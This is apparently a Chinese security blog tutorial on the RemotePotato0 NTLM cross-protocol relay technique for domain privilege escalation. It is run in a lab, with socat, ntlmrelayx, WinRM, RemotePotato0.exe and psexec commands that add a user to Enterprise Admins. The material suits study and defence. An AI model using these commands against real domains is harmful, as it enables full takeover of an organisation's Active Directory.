RemotePotato0域内权限提升漏洞
【摘要】 RemotePotato是Antonio Cocomazzi和Andrea Pierini发现的一种域内攻击技术,它允许攻击者将域用户权限提升到Enterprise Admin组内,此技术执行跨协议中继以实现NTLM Relay攻击,并将提升的NTLM身份验证流量中继到域控制器以实现权限提升。利用前提条件:具有域管理员特权的用户已经登录到受害者主机或通过远程桌面登录攻击者已获得对受害者主机...
RemotePotato是Antonio Cocomazzi和Andrea Pierini发现的一种域内攻击技术,它允许攻击者将域用户权限提升到Enterprise Admin组内,此技术执行跨协议中继以实现NTLM Relay攻击,并将提升的NTLM身份验证流量中继到域控制器以实现权限提升。
利用前提条件:
- 具有域管理员特权的用户已经登录到受害者主机或通过远程桌面登录
- 攻击者已获得对受害者主机的初始访问权限,或者已通过WinRM或SSH访问(拥有本地管理员权限的账号,可以是本地administrator账号或域普通用户)
- LDAP和SMB签名未配置
有如下拓扑图,
首先,在攻击机上执行如下命令,将本地135端口的流量转发到10.211.55.13的9998端口
sudo stty -tostop
sudo socat TCP-LISTEN:135,fork,reuseaddr TCP:10.211.55.13:9998
然后在攻击机上执行如下命令,进行ntlmrelay的监听,将要被提升权限的用户是hack
python3 ntlmrelayx.py -t ldap://10.211.55.4 --no-wcf-server --escalate-user hack
然后在攻击机上远程WinRM连接受害者机器。使用域用户hack登录,该用户在10.211.55.13的本地管理员组中。
pwsh
Enter-PSSession -ComputerName 10.211.55.13 -Authentication Negotiate -Credential $(get-credential)
然后在目标机器上执行RemotePotato0.exe程序
.\RemotePotato0.exe -r 10.211.55.15 -p 9998
可以看到,我们ntlmrelayx脚本这里已经攻击成功了,hack用户已经成功提权,加进了Enterprise admins管理员组内。
没提权权限之前hack用户不能远程连接域控。提升权限后,hack用户可以远程连接域控
python3 psexec.py xie/hack:P@ss1234@10.211.55.4
如果想跟我一起讨论的话,就快加入我的知识星球吧。星球里有一千多位同样爱好安全技术的小伙伴一起交流!
【版权声明】本文为华为云社区用户原创内容,未经允许不得转载,如需转载请自行联系原作者进行授权。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱:
cloudbbs@huaweicloud.com
- 点赞
- 收藏
- 关注作者
评论(0)